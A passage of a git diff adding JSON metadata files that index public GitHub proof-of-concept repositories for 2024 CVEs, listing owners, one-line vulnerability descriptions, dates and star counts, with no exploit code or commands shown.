"fork": false, + "created_at": "2024-11-05T12:27:41Z", + "updated_at": "2024-11-05T12:29:25Z", + "pushed_at": "2024-11-05T12:29:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50493.json b/2024/CVE-2024-50493.json new file mode 100644 index 0000000000..8777841d4f --- /dev/null +++ b/2024/CVE-2024-50493.json @@ -0,0 +1,33 @@ +[ + { + "id": 886111060, + "name": "CVE-2024-50493", + "full_name": "RandomRobbieBF\/CVE-2024-50493", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50493", + "description": "Automatic Translation <= 1.0.4 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-10T08:17:41Z", + "updated_at": "2024-11-10T08:18:31Z", + "pushed_at": "2024-11-10T08:18:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50498.json b/2024/CVE-2024-50498.json new file mode 100644 index 0000000000..ed3ba23129 --- /dev/null +++ b/2024/CVE-2024-50498.json @@ -0,0 +1,33 @@ +[ + { + "id": 883392821, + "name": "CVE-2024-50498", + "full_name": "RandomRobbieBF\/CVE-2024-50498", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50498", + "description": "WP Query Console <= 1.0 - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2024-11-04T22:13:45Z", + "updated_at": "2024-11-18T22:09:19Z", + "pushed_at": "2024-11-04T22:15:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5057.json b/2024/CVE-2024-5057.json new file mode 100644 index 0000000000..8bd2666180 --- /dev/null +++ b/2024/CVE-2024-5057.json @@ -0,0 +1,39 @@ +[ + { + "id": 894190256, + "name": "poc-CVE-2024-5057", + "full_name": "g1thubb004\/poc-CVE-2024-5057", + "owner": { + "login": "g1thubb004", + "id": 189642750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/189642750?v=4", + "html_url": "https:\/\/github.com\/g1thubb004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1thubb004\/poc-CVE-2024-5057", + "description": "poc-CVE-2024-5057", + "fork": false, + "created_at": "2024-11-25T23:10:28Z", + "updated_at": "2024-11-25T23:11:49Z", + "pushed_at": "2024-11-25T23:11:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-5057", + "exploit", + "poc", + "poc-cve-2024-5057" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50657.json b/2024/CVE-2024-50657.json new file mode 100644 index 0000000000..9d9b2c850e --- /dev/null +++ b/2024/CVE-2024-50657.json @@ -0,0 +1,33 @@ +[ + { + "id": 888839263, + "name": "CVE-2024-50657", + "full_name": "SAHALLL\/CVE-2024-50657", + "owner": { + "login": "SAHALLL", + "id": 90813381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90813381?v=4", + "html_url": "https:\/\/github.com\/SAHALLL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SAHALLL\/CVE-2024-50657", + "description": null, + "fork": false, + "created_at": "2024-11-15T05:22:27Z", + "updated_at": "2024-11-16T04:12:32Z", + "pushed_at": "2024-11-16T04:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50803.json b/2024/CVE-2024-50803.json new file mode 100644 index 0000000000..4d2bf4f414 --- /dev/null +++ b/2024/CVE-2024-50803.json @@ -0,0 +1,33 @@ +[ + { + "id": 889129803, + "name": "CVE-2024-50803-Redaxo", + "full_name": "Praison001\/CVE-2024-50803-Redaxo", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-50803-Redaxo", + "description": "Stored XSS in mediapool feature of Redaxo", + "fork": false, + "created_at": "2024-11-15T17:05:04Z", + "updated_at": "2024-11-19T17:56:09Z", + "pushed_at": "2024-11-19T17:56:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50804.json b/2024/CVE-2024-50804.json new file mode 100644 index 0000000000..e512e77779 --- /dev/null +++ b/2024/CVE-2024-50804.json @@ -0,0 +1,33 @@ +[ + { + "id": 883225767, + "name": "CVE-2024-50804", + "full_name": "g3tsyst3m\/CVE-2024-50804", + "owner": { + "login": "g3tsyst3m", + "id": 19558280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19558280?v=4", + "html_url": "https:\/\/github.com\/g3tsyst3m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g3tsyst3m\/CVE-2024-50804", + "description": "MSI Center Pro 2.1.37.0 - CVE-2024-50804", + "fork": false, + "created_at": "2024-11-04T15:38:19Z", + "updated_at": "2024-11-19T01:50:51Z", + "pushed_at": "2024-11-16T18:17:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5084.json b/2024/CVE-2024-5084.json new file mode 100644 index 0000000000..28b4ae54d3 --- /dev/null +++ b/2024/CVE-2024-5084.json @@ -0,0 +1,166 @@ +[ + { + "id": 805639631, + "name": "CVE-2024-5084", + "full_name": "KTN1990\/CVE-2024-5084", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-5084", + "description": "WordPress Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution", + "fork": false, + "created_at": "2024-05-25T03:49:04Z", + "updated_at": "2024-06-19T22:37:57Z", + "pushed_at": "2024-05-31T19:51:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "exploitwordpress", + "shell", + "upload", + "vulnerability", + "wordpress", + "wordpressexploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806742640, + "name": "CVE-2024-5084", + "full_name": "Chocapikk\/CVE-2024-5084", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-5084", + "description": "Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution", + "fork": false, + "created_at": "2024-05-27T20:04:10Z", + "updated_at": "2024-11-23T10:49:51Z", + "pushed_at": "2024-07-17T23:40:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 811151698, + "name": "CVE-2024-5084", + "full_name": "k3lpi3b4nsh33\/CVE-2024-5084", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-5084", + "description": null, + "fork": false, + "created_at": "2024-06-06T03:25:44Z", + "updated_at": "2024-06-06T03:29:27Z", + "pushed_at": "2024-06-06T03:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823453279, + "name": "CVE-2024-5084", + "full_name": "WOOOOONG\/CVE-2024-5084", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2024-5084", + "description": "PoC Exploit for CVE-2024-5084", + "fork": false, + "created_at": "2024-07-03T04:24:43Z", + "updated_at": "2024-07-03T04:25:23Z", + "pushed_at": "2024-07-03T04:24:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891893726, + "name": "CVE-2024-5084", + "full_name": "z1gazaga\/CVE-2024-5084", + "owner": { + "login": "z1gazaga", + "id": 121556738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121556738?v=4", + "html_url": "https:\/\/github.com\/z1gazaga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z1gazaga\/CVE-2024-5084", + "description": "Материалы для научной работы", + "fork": false, + "created_at": "2024-11-21T06:26:21Z", + "updated_at": "2024-11-21T07:11:38Z", + "pushed_at": "2024-11-21T07:11:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50848.json b/2024/CVE-2024-50848.json new file mode 100644 index 0000000000..f2a77d7274 --- /dev/null +++ b/2024/CVE-2024-50848.json @@ -0,0 +1,33 @@ +[ + { + "id": 889175343, + "name": "CVE-2024-50848", + "full_name": "Wh1teSnak3\/CVE-2024-50848", + "owner": { + "login": "Wh1teSnak3", + "id": 188617964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188617964?v=4", + "html_url": "https:\/\/github.com\/Wh1teSnak3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh1teSnak3\/CVE-2024-50848", + "description": null, + "fork": false, + "created_at": "2024-11-15T18:57:25Z", + "updated_at": "2024-11-15T19:29:50Z", + "pushed_at": "2024-11-15T19:29:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50849.json b/2024/CVE-2024-50849.json new file mode 100644 index 0000000000..795dda75d2 --- /dev/null +++ b/2024/CVE-2024-50849.json @@ -0,0 +1,33 @@ +[ + { + "id": 889195386, + "name": "CVE-2024-50849", + "full_name": "Wh1teSnak3\/CVE-2024-50849", + "owner": { + "login": "Wh1teSnak3", + "id": 188617964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188617964?v=4", + "html_url": "https:\/\/github.com\/Wh1teSnak3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh1teSnak3\/CVE-2024-50849", + "description": null, + "fork": false, + "created_at": "2024-11-15T19:51:18Z", + "updated_at": "2024-11-18T22:52:00Z", + "pushed_at": "2024-11-18T22:51:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50961.json b/2024/CVE-2024-50961.json new file mode 100644 index 0000000000..ec23a70f41 --- /dev/null +++ b/2024/CVE-2024-50961.json @@ -0,0 +1,37 @@ +[ + { + "id": 887738523, + "name": "CVE-2024-50961", + "full_name": "fdzdev\/CVE-2024-50961", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50961", + "description": "Remote attacker can access sensitive data exposed on the URL", + "fork": false, + "created_at": "2024-11-13T07:43:06Z", + "updated_at": "2024-11-13T07:53:44Z", + "pushed_at": "2024-11-13T07:47:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50961", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50962.json b/2024/CVE-2024-50962.json new file mode 100644 index 0000000000..f1c7ab6cd0 --- /dev/null +++ b/2024/CVE-2024-50962.json @@ -0,0 +1,37 @@ +[ + { + "id": 887740422, + "name": "CVE-2024-50962", + "full_name": "fdzdev\/CVE-2024-50962", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50962", + "description": "A Cross-Site Scripting (XSS) vulnerability", + "fork": false, + "created_at": "2024-11-13T07:47:38Z", + "updated_at": "2024-11-13T08:28:29Z", + "pushed_at": "2024-11-13T07:48:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50962", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50964.json b/2024/CVE-2024-50964.json new file mode 100644 index 0000000000..bfd850d53f --- /dev/null +++ b/2024/CVE-2024-50964.json @@ -0,0 +1,37 @@ +[ + { + "id": 887741002, + "name": "CVE-2024-50964", + "full_name": "fdzdev\/CVE-2024-50964", + "owner": { + "login": "fdzdev", + "id": 17630462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17630462?v=4", + "html_url": "https:\/\/github.com\/fdzdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fdzdev\/CVE-2024-50964", + "description": "MX Server misconfiguration", + "fork": false, + "created_at": "2024-11-13T07:49:09Z", + "updated_at": "2024-11-13T08:28:26Z", + "pushed_at": "2024-11-13T07:51:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50964", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50968.json b/2024/CVE-2024-50968.json new file mode 100644 index 0000000000..c6e129426f --- /dev/null +++ b/2024/CVE-2024-50968.json @@ -0,0 +1,33 @@ +[ + { + "id": 887259811, + "name": "CVE-2024-50968", + "full_name": "Akhlak2511\/CVE-2024-50968", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50968", + "description": null, + "fork": false, + "created_at": "2024-11-12T12:48:17Z", + "updated_at": "2024-11-12T13:02:03Z", + "pushed_at": "2024-11-12T13:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50969.json b/2024/CVE-2024-50969.json new file mode 100644 index 0000000000..23f84d1717 --- /dev/null +++ b/2024/CVE-2024-50969.json @@ -0,0 +1,33 @@ +[ + { + "id": 887401537, + "name": "CVE-2024-50969", + "full_name": "Akhlak2511\/CVE-2024-50969", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50969", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:20:07Z", + "updated_at": "2024-11-12T17:28:23Z", + "pushed_at": "2024-11-12T17:28:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50970.json b/2024/CVE-2024-50970.json new file mode 100644 index 0000000000..a2285a69db --- /dev/null +++ b/2024/CVE-2024-50970.json @@ -0,0 +1,33 @@ +[ + { + "id": 887406221, + "name": "CVE-2024-50970", + "full_name": "Akhlak2511\/CVE-2024-50970", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50970", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:30:00Z", + "updated_at": "2024-11-12T17:34:01Z", + "pushed_at": "2024-11-12T17:33:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50971.json b/2024/CVE-2024-50971.json new file mode 100644 index 0000000000..f883ca637a --- /dev/null +++ b/2024/CVE-2024-50971.json @@ -0,0 +1,33 @@ +[ + { + "id": 887409068, + "name": "CVE-2024-50971", + "full_name": "Akhlak2511\/CVE-2024-50971", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50971", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:36:02Z", + "updated_at": "2024-11-12T17:39:26Z", + "pushed_at": "2024-11-12T17:39:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50972.json b/2024/CVE-2024-50972.json new file mode 100644 index 0000000000..3ff74b2863 --- /dev/null +++ b/2024/CVE-2024-50972.json @@ -0,0 +1,33 @@ +[ + { + "id": 887411310, + "name": "CVE-2024-50972", + "full_name": "Akhlak2511\/CVE-2024-50972", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50972", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:40:54Z", + "updated_at": "2024-11-12T17:43:51Z", + "pushed_at": "2024-11-12T17:43:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50986.json b/2024/CVE-2024-50986.json new file mode 100644 index 0000000000..162a586e1a --- /dev/null +++ b/2024/CVE-2024-50986.json @@ -0,0 +1,33 @@ +[ + { + "id": 887656070, + "name": "CVE-2024-50986", + "full_name": "riftsandroses\/CVE-2024-50986", + "owner": { + "login": "riftsandroses", + "id": 63180210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63180210?v=4", + "html_url": "https:\/\/github.com\/riftsandroses", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riftsandroses\/CVE-2024-50986", + "description": "An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)", + "fork": false, + "created_at": "2024-11-13T03:49:07Z", + "updated_at": "2024-11-16T16:11:59Z", + "pushed_at": "2024-11-16T16:11:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51026.json b/2024/CVE-2024-51026.json new file mode 100644 index 0000000000..641a48d004 --- /dev/null +++ b/2024/CVE-2024-51026.json @@ -0,0 +1,33 @@ +[ + { + "id": 886757040, + "name": "CVE-2024-51026_Overview", + "full_name": "BrotherOfJhonny\/CVE-2024-51026_Overview", + "owner": { + "login": "BrotherOfJhonny", + "id": 28454566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28454566?v=4", + "html_url": "https:\/\/github.com\/BrotherOfJhonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrotherOfJhonny\/CVE-2024-51026_Overview", + "description": "Sistema NetAdmin IAM 4 é vulnerável a Cross Site Scripting (XSS), no endpoint \/BalloonSave.ashx", + "fork": false, + "created_at": "2024-11-11T14:49:47Z", + "updated_at": "2024-11-11T14:58:58Z", + "pushed_at": "2024-11-11T14:58:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51030.json b/2024/CVE-2024-51030.json new file mode 100644 index 0000000000..d265066d98 --- /dev/null +++ b/2024/CVE-2024-51030.json @@ -0,0 +1,33 @@ +[ + { + "id": 883929203, + "name": "CVE-2024-51030", + "full_name": "vighneshnair7\/CVE-2024-51030", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-51030", + "description": null, + "fork": false, + "created_at": "2024-11-05T20:33:56Z", + "updated_at": "2024-11-05T20:45:23Z", + "pushed_at": "2024-11-05T20:45:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51031.json b/2024/CVE-2024-51031.json new file mode 100644 index 0000000000..950a07cbae --- /dev/null +++ b/2024/CVE-2024-51031.json @@ -0,0 +1,33 @@ +[ + { + "id": 883938105, + "name": "CVE-2024-51031", + "full_name": "vighneshnair7\/CVE-2024-51031", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-51031", + "description": null, + "fork": false, + "created_at": "2024-11-05T20:59:14Z", + "updated_at": "2024-11-05T21:04:48Z", + "pushed_at": "2024-11-05T21:04:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51032.json b/2024/CVE-2024-51032.json new file mode 100644 index 0000000000..b48e614525 --- /dev/null +++ b/2024/CVE-2024-51032.json @@ -0,0 +1,33 @@ +[ + { + "id": 883932000, + "name": "CVE-2024-51032", + "full_name": "Shree-Chandragiri\/CVE-2024-51032", + "owner": { + "login": "Shree-Chandragiri", + "id": 187441471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/187441471?v=4", + "html_url": "https:\/\/github.com\/Shree-Chandragiri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shree-Chandragiri\/CVE-2024-51032", + "description": "A Cross-site Scripting (XSS) vulnerability in manage_recipient.php of Sourcecodester Toll Tax Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the \"owner\" input field.", + "fork": false, + "created_at": "2024-11-05T20:41:15Z", + "updated_at": "2024-11-05T21:04:24Z", + "pushed_at": "2024-11-05T21:04:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51132.json b/2024/CVE-2024-51132.json new file mode 100644 index 0000000000..ff8ca690ed --- /dev/null +++ b/2024/CVE-2024-51132.json @@ -0,0 +1,33 @@ +[ + { + "id": 882327865, + "name": "CVE-2024-51132-POC", + "full_name": "JAckLosingHeart\/CVE-2024-51132-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-51132-POC", + "description": null, + "fork": false, + "created_at": "2024-11-02T14:30:29Z", + "updated_at": "2024-11-21T07:42:10Z", + "pushed_at": "2024-11-09T07:58:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51135.json b/2024/CVE-2024-51135.json new file mode 100644 index 0000000000..9b395aba52 --- /dev/null +++ b/2024/CVE-2024-51135.json @@ -0,0 +1,33 @@ +[ + { + "id": 885647624, + "name": "CVE-2024-51135", + "full_name": "JAckLosingHeart\/CVE-2024-51135", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-51135", + "description": null, + "fork": false, + "created_at": "2024-11-09T02:57:22Z", + "updated_at": 